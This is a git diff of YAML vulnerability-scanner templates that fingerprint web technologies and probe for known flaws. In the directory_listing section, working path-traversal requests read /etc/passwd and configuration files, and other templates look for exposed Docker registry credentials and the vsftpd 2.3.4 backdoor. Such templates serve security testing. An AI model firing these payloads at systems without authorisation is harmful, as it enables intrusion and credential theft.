requests: - method: GET diff --git a/poc/detect/seeddms-detect-10129.yaml b/poc/detect/seeddms-detect-10129.yaml index 307611e1d0..1c313a8fde 100644 --- a/poc/detect/seeddms-detect-10129.yaml +++ b/poc/detect/seeddms-detect-10129.yaml @@ -1,21 +1,21 @@ -id: seeddms-detect -info: - name: Seeddms- - author: pussycat0x - severity: info - tags: tech -requests: - - method: GET - path: - - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - words: - - "SeedDMS: Sign in" - - type: status - status: +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/detect/shiro-detect.yaml b/poc/detect/shiro-detect.yaml index b918ac9d43..d1b92dd808 100644 --- a/poc/detect/shiro-detect.yaml +++ b/poc/detect/shiro-detect.yaml @@ -3,14 +3,17 @@ info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro requests: - method: GET path: - '{{BaseURL}}' headers: - Cookie: rememberMe=123; + Cookie: JSESSIONID={{randstr}};rememberMe=123; + redirects: true + max-redirects: 2 matchers: - type: word - words: - - rememberMe=deleteMe part: header + words: + - "rememberMe=deleteMe" diff --git a/poc/detect/shopware-detect.yaml b/poc/detect/shopware-detect.yaml index 2765f4f1d3..edf59386b6 100644 --- a/poc/detect/shopware-detect.yaml +++ b/poc/detect/shopware-detect.yaml @@ -7,16 +7,12 @@ info: reference: - https://github.com/shopware/shopware - https://github.com/shopware/platform - metadata: - verified: true - shodan-query: title:"shopware AG" tags: tech,shopware,cms requests: - method: GET path: - "{{BaseURL}}/admin" - "{{BaseURL}}/backend" - stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/poc/detect/strapi-cms-detect.yaml b/poc/detect/strapi-cms-detect.yaml index c08945df08..530e120e7e 100644 --- a/poc/detect/strapi-cms-detect.yaml +++ b/poc/detect/strapi-cms-detect.yaml @@ -1,5 +1,4 @@ id: strapi-cms-detect - info: name: Strapi CMS detect author: cyllective,daffainfo,idealphase @@ -8,12 +7,10 @@ info: reference: - https://github.com/strapi/strapi tags: tech,strapi,cms - requests: - method: GET path: - "{{BaseURL}}/admin/init" - matchers-condition: and matchers: - type: word @@ -23,11 +20,9 @@ requests: - '"uuid"' - '"hasAdmin"' condition: and - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/detect/tech-detect-10672.yaml b/poc/detect/tech-detect-10672.yaml index 0f825bbc34..bcc54813d1 100644 --- a/poc/detect/tech-detect-10672.yaml +++ b/poc/detect/tech-detect-10672.yaml @@ -261,14 +261,6 @@ requests: - "<[^>]+sc-component-id: sc-" condition: or part: body - - type: regex - name: prestashop - regex: - - Powered by ]+>PrestaShop - - - - - condition: or - part: body - type: regex name: youtrack regex: @@ -344,12 +336,6 @@ requests: - ]+smartadserver\.com\/call condition: or part: body - - type: regex - name: wordpress-super-cache - regex: - - " + - type: word + name: dynamicweb + words: + - 'content="Dynamicweb ' + - type: word + name: E+-cms + words: + - 'content="e-plus ' + - type: word + name: e-monsite + words: + - 'content="e-monsite (e-monsite.com)"' + - type: word + name: ecshop + words: + - 'content="ECSHOP ' + - type: word + name: easysite + words: + - 'content="Ideagen - WCM ' + - type: word + name: episerver + words: + - 'src="https://dl.episerver.net/' + - type: word + name: everweb + words: + - 'content="EverWeb ' + - type: word + name: fork-cms + words: + - 'content="Fork CMS"' + - type: word + name: zeta-producer + words: + - 'content="Zeta Producer ' + - type: word + name: gx-web-manager + words: + - 'content="GX WebManager' + - type: word + name: getsimple-cms + words: + - 'content="GetSimple"' + - type: word + name: ghost + words: + - 'content="Ghost ' + - type: word + name: go-daddy-website-builder + words: + - 'content="Starfield Technologies; Go Daddy Website Builder' + - type: word + name: government-site-builder + words: + - 'content="Government Site Builder"' + - type: word + name: graffiticms + words: + - 'content="Graffiti CMS' + - type: word + name: grav-cms + words: + - 'content="GravCMS"' + - type: word + name: drupal + words: + - 'content="Drupal' + - type: word + name: webnode + words: + - 'content="Webnode' + - type: word + name: shopsys + words: + - "'Shopsys\\" + - type: word + name: pluck-cms + words: + - 'content="pluck ' + - type: word + name: homestead + words: + - 'content="Homestead SiteBuilder"' + - type: word + name: hostedshop + words: + - 'content="HostedShop"' + - type: word + name: imagecms + words: + - 'content="ImageCMS"' + - type: word + name: immediacy + words: + - 'content="Immediacy .NET CMS' + - type: word + name: impresscms + words: + - 'content="ImpressCMS"' + - type: word + name: impresspages-cms + words: + - 'content="ImpressPages"' + - type: word + name: infopark-cms-fiona + words: + - 'content="Rails Connector for Infopark CMS Fiona' + - type: word + name: instantcms + words: + - 'content="InstantCMS"' + - type: word + name: interred + words: + - 'content="InterRed ' + - type: word + name: jadu-cms + words: + - "//www.jadu.net" + - type: word + name: jieqi-cms + words: + - 'content="jieqi.com"' + - type: word + name: justsystems-homepage-builder + words: + - 'content="JustSystems Homepage Builder' + - type: word + name: kvs-cms + words: + - 'content="Kernel Video Sharing ' + - type: word + name: komodo-cms + words: + - 'content="Komodo CMS"' + - type: word + name: kryptronic + words: + - 'content="Kryptronic Software"' + - type: word + name: labrador-cms + words: + - "by Labrador CMS" + - type: word + name: lauyan-toweb + words: + - 'content="Lauyan TOWeb ' + - type: word + name: liveedit + words: + - 'content="http://www.getLiveEdit.com"' + - type: word + name: logicommerce + words: + - 'content="LogiCommerce"' + - type: word + name: loja-integrada + words: + - 'content="Loja Integrada"' + - type: word + name: mabisy + words: + - 'content="Mabisy"' + - type: word + name: mambo + words: + - 'content="Mambo -' + - type: word + name: melody + words: + - 'content="Melody CMS"' + - type: word + name: metro-publisher + words: + - 'content="Metro Publisher ' + - type: word + name: midgard-cms + words: + - 'powered">Midgard CMS' + - type: word + name: mijnwebwinkel + words: + - 'content="Mijnwebwinkel"' + - type: word + name: mintox + words: + - "MintoxPlaceHolder" + - type: word + name: movable-type + words: + - 'content="JetBrains PhpStorm/Intercat/Movable Type' + - type: word + name: netvolution + words: + - 'content="Netvolution WCM"' + - type: word + name: nucleus + words: + - 'content="Nucleus CMS ' + - type: word + name: nukeviet + words: + - 'content="NukeViet ' + - type: word + name: one.com + words: + - 'content="One.com Web Editor"' + - type: word + name: opennemas + words: + - 'content="OpenNemas ' + - type: word + name: orchard + words: + - 'content="Orchard"' + - type: word + name: orthodox-web-solutions + words: + - 'content="Orthodox Web Solutions ' + - type: word + name: osclass + words: + - "oc-includes/osclass/" + - type: word + name: oxatis + words: + - 'content="Oxatis ' + - type: word + name: phpshop + words: + - 'content="PHPShop CMS ' + - type: word + name: phpvide + words: + - 'content="PHPVibe"' + - type: word + name: pagecloud + words: + - 'content="Pagecloud"' + - type: word + name: pagekit + words: + - 'content="Pagekit"' + - type: word + name: parallels-presence-builder + words: + - 'content="Parallels Presence Builder ' + - type: word + name: ritecms + words: + - 'content="RiteCMS' + - type: word + name: rcms + words: + - 'content="rCMS ' + - type: word + name: rvsitebuilder + words: + - 'content="Rvglobalsoft"' + - type: word + name: subrion-cms + words: + - 'content="Subrion CMS' + - type: word + name: rapidweaver + words: + - 'content="RapidWeaver"' + - type: word + name: sumoshop + words: + - 'content="SUMOshop"' + - type: word + name: sana-commerce + words: + - 'content="Sana Commerce"' + - type: word + name: sandvox + words: + - 'content="Sandvox ' + - type: word + name: seamless-cms + words: + - 'content="OpenCities ' + - type: word + name: serendipity + words: + - 'content="Serendipity ' + - type: word + name: shopfactory + words: + - 'content="ShopFactory ' - type: word name: clockwork words: @@ -2520,11 +2917,6 @@ requests: - "ng-controller=" condition: or part: body - - type: word - name: apache - words: - - "Apache" - part: header - type: word name: lighttpd words: @@ -2565,11 +2957,6 @@ requests: words: - "Microsoft-HTTPAPI" part: header - - type: word - name: tomcat - words: - - "Tomcat" - part: header - type: word name: darkhttpd words: @@ -2697,7 +3084,7 @@ requests: - "Mida eFramework" - "Server: Mida eFramework" condition: or - part: all + part: response - type: word name: SEEEMS-CMS words: @@ -2708,7 +3095,7 @@ requests: - type: regex name: awselb regex: - - 'awselb' + - "awselb" part: header - type: word name: pfsense @@ -2722,9 +3109,21 @@ requests: name: monit part: header words: - - 'Server: monit' + - "Server: monit" - type: word name: thinkphp + part: header words: - "ThinkPHP" - part: header + - type: word + name: apollo + part: body + words: + - "initApollo)(i.ApolloTargetServer.Self)" + - type: word + name: paloalto-network + part: body + words: + - "" + - "js/pan/" + condition: and diff --git a/poc/detect/terraform-detect-10708.yaml b/poc/detect/terraform-detect-10708.yaml index 2ba8d1cd70..4a458c77e2 100644 --- a/poc/detect/terraform-detect-10708.yaml +++ b/poc/detect/terraform-detect-10708.yaml @@ -1,22 +1,26 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info tags: tech,terraform + requests: - method: GET path: - "{{BaseURL}}/provider.tf" + matchers-condition: and matchers: - type: word part: body words: - - "access_key" - - "terraform" + - access_key + - terraform condition: and + - type: status status: - 200 diff --git a/poc/detect/thinkcmf-detect.yaml b/poc/detect/thinkcmf-detect.yaml index 0c0bcdca20..ee3d1f7ccf 100644 --- a/poc/detect/thinkcmf-detect.yaml +++ b/poc/detect/thinkcmf-detect.yaml @@ -1,20 +1,23 @@ -id: thinkcmf-detection +id: thinkcmf-detection-2 + info: - name: ThinkCMF Detection - author: pikpikcu + name: Detect ThinkCMF + author: pikpikcu,daffainfo severity: info - tags: thinkcmf + tags: panel,thinkcmf,login + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - - "X-Powered-By: ThinkCMF" - part: header - condition: and + - '' + - type: status status: - 200 diff --git a/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml b/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml index d229013dd5..dd6e155d1a 100644 --- a/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml +++ b/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml @@ -1,24 +1,20 @@ -id: unauthorized-puppet-node-manager - -info: - name: Pupet Node Manager - author: pussycat0x - severity: medium - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Nodes' - - - type: status - status: - - 200 +id: unauthorized-puppet-node-manager +info: + name: Pupet Node Manager + author: pussycat0x + severity: medium + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,misconfig +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Nodes' + - type: status + status: + - 200 diff --git a/poc/detect/virtual-ema-detect.yaml b/poc/detect/virtual-ema-detect.yaml index c9d2574216..d2d879c70b 100644 --- a/poc/detect/virtual-ema-detect.yaml +++ b/poc/detect/virtual-ema-detect.yaml @@ -3,7 +3,7 @@ info: name: Virtual EMS Panel Detection author: iamthefrogy severity: info - tags: panel,ems + tags: panel requests: - method: GET path: diff --git a/poc/detect/vsftpd-detection.yaml b/poc/detect/vsftpd-detection.yaml index f4ecde4fab..934be20cb9 100644 --- a/poc/detect/vsftpd-detection.yaml +++ b/poc/detect/vsftpd-detection.yaml @@ -1,10 +1,18 @@ id: vsftpd-detection info: - name: VSFTPD v2.3.4 Backdoor Command Execution + name: VSFTPD 2.3.4 - Backdoor Command Execution author: pussycat0x severity: critical - tags: network,vsftpd,ftp - reference: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. + reference: + - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-78 + remediation: This backdoor was removed on July 3rd, 2011. + tags: network,vsftpd,ftp,backdoor network: - inputs: - data: "USER anonymous\r\nPASS pussycat0x\r\n" @@ -15,3 +23,5 @@ network: - type: word words: - "vsFTPd 2.3.4" + +# Enhanced by mp on 2022/05/23 diff --git a/poc/detect/wamp-xdebug-detect.yaml b/poc/detect/wamp-xdebug-detect.yaml index a0cff18d8e..c9dc3a07bb 100644 --- a/poc/detect/wamp-xdebug-detect.yaml +++ b/poc/detect/wamp-xdebug-detect.yaml @@ -1,17 +1,14 @@ id: wamp-xdebug-detect - info: name: WAMP xdebug author: e_schultze_ severity: info - # Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py - # Goal: detect if xdebug.remote_connect_back is enabled - + reference: https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + tags: debug,config requests: - method: GET path: - "{{BaseURL}}/?phpinfo=-1" - matchers: - type: word words: diff --git a/poc/detect/wazuh-detect.yaml b/poc/detect/wazuh-detect.yaml index 2961a8e89c..7aa27898c8 100644 --- a/poc/detect/wazuh-detect.yaml +++ b/poc/detect/wazuh-detect.yaml @@ -1,5 +1,4 @@ id: wazuh-detect - info: name: wazuh detect author: cyllective @@ -8,12 +7,10 @@ info: tags: tech,wazuh reference: - https://github.com/wazuh/wazuh - requests: - method: GET path: - "{{BaseURL}}/app/login" - matchers: - type: word part: body diff --git a/poc/detect/weblogic-detect-11144.yaml b/poc/detect/weblogic-detect-11144.yaml index 23f46a01a8..d50d670388 100644 --- a/poc/detect/weblogic-detect-11144.yaml +++ b/poc/detect/weblogic-detect-11144.yaml @@ -1,22 +1,13 @@ id: weblogic-detect info: name: Detect Weblogic - author: pdteam + author: bing0o severity: info - tags: tech,weblogic - metadata: - shodan-query: product:"Oracle Weblogic" requests: - method: GET path: - - "{{BaseURL}}/{{randstr}}" - matchers-condition: and + - "{{BaseURL}}/console/login/LoginForm.jsp" matchers: - type: word words: - - "From RFC 2068" - - "Error 404--Not Found" - condition: and - - type: status - status: - - 404 + - "WebLogic" diff --git a/poc/detect/werkzeug-debugger-detect-11197.yaml b/poc/detect/werkzeug-debugger-detect-11197.yaml index fe448bbca2..aa90f4c1a3 100644 --- a/poc/detect/werkzeug-debugger-detect-11197.yaml +++ b/poc/detect/werkzeug-debugger-detect-11197.yaml @@ -4,19 +4,14 @@ info: name: Werkzeug debugger console author: pdteam severity: info - metadata: - max-request: 1 tags: tech,werkzeug -http: +requests: - method: GET path: - "{{BaseURL}}/console" - matchers: - type: word words: - "

Interactive Console

" part: body - -# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/wordpress-plugins-detect.yaml b/poc/detect/wordpress-plugins-detect.yaml index e6fcb6dba4..fb3b30feac 100644 --- a/poc/detect/wordpress-plugins-detect.yaml +++ b/poc/detect/wordpress-plugins-detect.yaml @@ -1,47 +1,29 @@ id: wordpress-plugins-detect - info: name: WordPress Plugins Detection - author: 0xcrypto, foulenzer - severity: high + author: 0xcrypto + severity: info tags: fuzz,wordpress - requests: - raw: - | - GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1 + GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} threads: 50 payloads: - plugin: - - contact-form-7 - - wordpress-seo - - elementor - - woocommerce - - all-in-one-wp-migration - - updraftplus - - all-in-one-seo-pack - - duplicator - - essential-addons-for-elementor-lite - - optinmonster - - w3-total-cache - - redux-framework - - ninja-forms - + pluginSlug: helpers/wordlists/wordpress-plugins.txt matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "== Description ==" - extractors: - type: regex part: body group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version diff --git a/poc/detect/wordpress-themes-detect-11316.yaml b/poc/detect/wordpress-themes-detect-11316.yaml index 4c487c4563..cb4bd85628 100644 --- a/poc/detect/wordpress-themes-detect-11316.yaml +++ b/poc/detect/wordpress-themes-detect-11316.yaml @@ -1,23 +1,22 @@ id: wordpress-themes-detect info: - name: WordPress Theme Detection - author: 0xcrypto, foulenzer - severity: high - tags: fuzz,wordpress + name: Find Wordpress Themes + author: micro. + severity: info + description: It detect the wordpress themes. + metadata: + max-request: 24434 -requests: +http: - raw: - | - GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1 + GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} + payloads: - theme: - - twentyfifteen - - shapely - - onepress + themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 matchers-condition: and matchers: - type: status @@ -26,4 +25,4 @@ requests: - type: word words: - - "== Description ==" \ No newline at end of file + - "== Description ==" diff --git a/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml b/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml index d1f2247e27..e9faa5f0c8 100644 --- a/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml +++ b/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml @@ -3,10 +3,10 @@ info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 + tags: wordpress,ssrf,oast,xmlrpc requests: - raw: - | diff --git a/poc/detect/yapi-detect.yaml b/poc/detect/yapi-detect.yaml index 8cf92f5a49..3d24ff00ba 100644 --- a/poc/detect/yapi-detect.yaml +++ b/poc/detect/yapi-detect.yaml @@ -3,12 +3,13 @@ info: name: YApi Detect author: pikpikcu severity: info + metadata: + shodan-query: http.title:"YApi" tags: tech,yapi requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}:3000" + - "{{BaseURL}}" matchers-condition: and matchers: - type: word diff --git a/poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml b/poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml old mode 100755 new mode 100644 diff --git a/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml b/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml index ebe0ce2d65..3ebe236378 100644 --- a/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml +++ b/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml @@ -3,9 +3,8 @@ info: name: Ecology Directory Traversal author: princechaddha severity: medium - metadata: - fofa-query: app="泛微-协同办公OA" tags: ecology,lfi + requests: - method: GET path: diff --git a/poc/directory_listing/ecology-springframework-directoryTraversal.yaml b/poc/directory_listing/ecology-springframework-directoryTraversal.yaml old mode 100755 new mode 100644 diff --git a/poc/directory_listing/erp-nc-directory-traversal.yaml b/poc/directory_listing/erp-nc-directory-traversal.yaml index e331d54978..c5d6ef641e 100644 --- a/poc/directory_listing/erp-nc-directory-traversal.yaml +++ b/poc/directory_listing/erp-nc-directory-traversal.yaml @@ -1,14 +1,17 @@ id: erp-nc-directory-traversal + info: name: ERP-NC directory traversal author: pikpikcu severity: high reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: lfi,erp-nc + requests: - method: GET path: - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - "admin.jsp" part: body condition: and + - type: status status: - 200 diff --git a/poc/directory_listing/flir-path-traversal.yaml b/poc/directory_listing/flir-path-traversal.yaml index 596e30a0de..dca421c8ce 100644 --- a/poc/directory_listing/flir-path-traversal.yaml +++ b/poc/directory_listing/flir-path-traversal.yaml @@ -1,25 +1,20 @@ id: flir-path-traversal - info: name: Flir Path Traversal author: pikpikcu severity: high reference: https://juejin.cn/post/6961370156484263972 tags: flir,lfi - requests: - method: GET path: - "{{BaseURL}}/download.php?file=/etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - - type: status status: - 200 diff --git a/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml b/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml index fdbcdb53af..f9fbad5322 100644 --- a/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml +++ b/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml @@ -1,15 +1,10 @@ id: ibm-infoprint-lfi info: - name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion + name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal author: harshbothra_ severity: medium - description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/47835 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer. + reference: https://www.exploit-db.com/exploits/47835 tags: ibm,lfi,matrix,printer requests: - method: GET @@ -24,5 +19,3 @@ requests: regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/07/22 diff --git a/poc/directory_listing/natshell-path-traversal.yaml b/poc/directory_listing/natshell-path-traversal.yaml index 9dd202e3ec..391bb848a2 100644 --- a/poc/directory_listing/natshell-path-traversal.yaml +++ b/poc/directory_listing/natshell-path-traversal.yaml @@ -1,29 +1,24 @@ id: natshell-path-traversal + info: - name: NatShell - Local File Inclusion + name: NatShell Path Traversal author: pikpikcu severity: high - description: NatShell is vulnerable to local file inclusion. - reference: - - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - fofa-query: title="蓝海卓越计费管理系统" + reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw tags: natshell,lfi + requests: - method: GET path: - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - "toor:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/27 diff --git a/poc/directory_listing/oa-tongda-path-traversal-9177.yaml b/poc/directory_listing/oa-tongda-path-traversal-9177.yaml index a5d4aa6dfc..56aa950f64 100644 --- a/poc/directory_listing/oa-tongda-path-traversal-9177.yaml +++ b/poc/directory_listing/oa-tongda-path-traversal-9177.yaml @@ -1,11 +1,12 @@ id: oa-tongda-path-traversal + info: name: OA TongDa Path Traversal author: pikpikcu severity: critical - reference: - - https://github.com/jas502n/OA-tongda-RCE + reference: https://github.com/jas502n/OA-tongda-RCE tags: tongda,lfi + requests: - raw: - | @@ -14,6 +15,7 @@ requests: Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../mysql5/my.ini"} + matchers-condition: and matchers: - type: word diff --git a/poc/directory_listing/pmb-directory-traversal.yaml b/poc/directory_listing/pmb-directory-traversal.yaml index 8c9f04c593..8770d69cab 100644 --- a/poc/directory_listing/pmb-directory-traversal.yaml +++ b/poc/directory_listing/pmb-directory-traversal.yaml @@ -1,23 +1,22 @@ id: pmb-directory-traversal + info: - name: PMB 5.6 - Arbitrary File Retrieval + name: PMB 5.6 Directory Traversal + reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html author: geeknik severity: medium - description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval. - reference: - - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html - tags: lfi + requests: - method: GET path: - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - stop-at-first-match: true + matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" - type: status status: - 200 diff --git a/poc/directory_listing/tpshop-directory-traversal.yaml b/poc/directory_listing/tpshop-directory-traversal.yaml index 7f794cefeb..47af9e5038 100644 --- a/poc/directory_listing/tpshop-directory-traversal.yaml +++ b/poc/directory_listing/tpshop-directory-traversal.yaml @@ -1,27 +1,24 @@ id: tpshop-directory-traversal + info: - name: TPshop - Local File Inclusion + name: TPshop Directory Traversal author: pikpikcu - description: TPshop is vulnerable to local file inclusion. severity: high - reference: - - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA tags: tpshop,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../" + matchers-condition: and matchers: + - type: word words: - '"state":"SUCCESS"' + - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/directory_listing/wooyun-path-traversal.yaml b/poc/directory_listing/wooyun-path-traversal.yaml index 515f1293b5..bb0ba90489 100644 --- a/poc/directory_listing/wooyun-path-traversal.yaml +++ b/poc/directory_listing/wooyun-path-traversal.yaml @@ -1,21 +1,21 @@ id: wooyun-path-traversal - info: - name: Wooyun Path Traversal + name: Wooyun - Local File Inclusion author: pikpikcu severity: high - reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html description: | - A general document of UFIDA ERP-NC contains a vulnerability - (affecting a large number of well-known school government and enterprise cases - such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) - tags: lfi - + Wooyun is vulnerable to local file inclusion. + reference: + - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: lfi,wooyun requests: - method: GET path: - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml" - matchers-condition: and matchers: - type: status @@ -26,4 +26,6 @@ requests: - - part: body - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/07/29 diff --git a/poc/docker/docker-compose-config.yaml b/poc/docker/docker-compose-config.yaml index 7a8bba1698..a0adf33410 100644 --- a/poc/docker/docker-compose-config.yaml +++ b/poc/docker/docker-compose-config.yaml @@ -1,11 +1,9 @@ id: docker-compose-config - info: name: docker-compose.yml exposure author: meme-lord,blckraven,geeknik severity: medium tags: config,exposure,devops - requests: - method: GET redirects: true @@ -18,14 +16,12 @@ requests: - "{{BaseURL}}/docker-compose.dev.yml" - "{{BaseURL}}/docker-compose-dev.yml" - "{{BaseURL}}/docker-compose.override.yml" - stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - 'regex("^version: ", body) && contains(body, "services:")' - - type: status status: - 200 diff --git a/poc/docker/dockercfg-config.yaml b/poc/docker/dockercfg-config.yaml index b3b3106bb5..98e9374f57 100644 --- a/poc/docker/dockercfg-config.yaml +++ b/poc/docker/dockercfg-config.yaml @@ -1,32 +1,26 @@ id: dockercfg-config - info: name: Detect .dockercfg author: geeknik severity: high description: Docker registry authentication data tags: docker,exposure,config - requests: - method: GET path: - "{{BaseURL}}/.dockercfg" - "{{BaseURL}}/.docker/config.json" - matchers-condition: and matchers: - - type: word words: - '"email":' - '"auth":' condition: and - - type: word part: header words: - "text/plain" - - type: status status: - 200 diff --git a/poc/docker/dockerfile-hidden-disclosure.yaml b/poc/docker/dockerfile-hidden-disclosure.yaml index feb4a915f9..e62fc2fc5e 100644 --- a/poc/docker/dockerfile-hidden-disclosure.yaml +++ b/poc/docker/dockerfile-hidden-disclosure.yaml @@ -3,7 +3,8 @@ info: name: Dockerfile Hidden Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json tags: exposure,config requests: - method: GET diff --git a/poc/docker/kubernetes-enterprise-manager-8528.yaml b/poc/docker/kubernetes-enterprise-manager-8528.yaml index 302d824370..76bbb6be88 100644 --- a/poc/docker/kubernetes-enterprise-manager-8528.yaml +++ b/poc/docker/kubernetes-enterprise-manager-8528.yaml @@ -1,21 +1,25 @@ id: kubernetes-enterprise-manager + info: name: Detect Kubernetes Enterprise Manager author: pussycat0x severity: info - metadata: - fofa-query: app="Kubernetes-Enterprise-Manager" tags: tech,kubernetes + metadata: + fofa-query: 'app="Kubernetes-Enterprise-Manager"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - "Kubernetes Enterprise Manager" + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/docker/kubernetes-pods-8542.yaml b/poc/docker/kubernetes-pods-8542.yaml index aa6e146225..302ed569e8 100644 --- a/poc/docker/kubernetes-pods-8542.yaml +++ b/poc/docker/kubernetes-pods-8542.yaml @@ -1,36 +1,25 @@ id: kubernetes-pods-api - info: - name: Kubernetes Pods - API Discovery & Remote Code Execution + name: 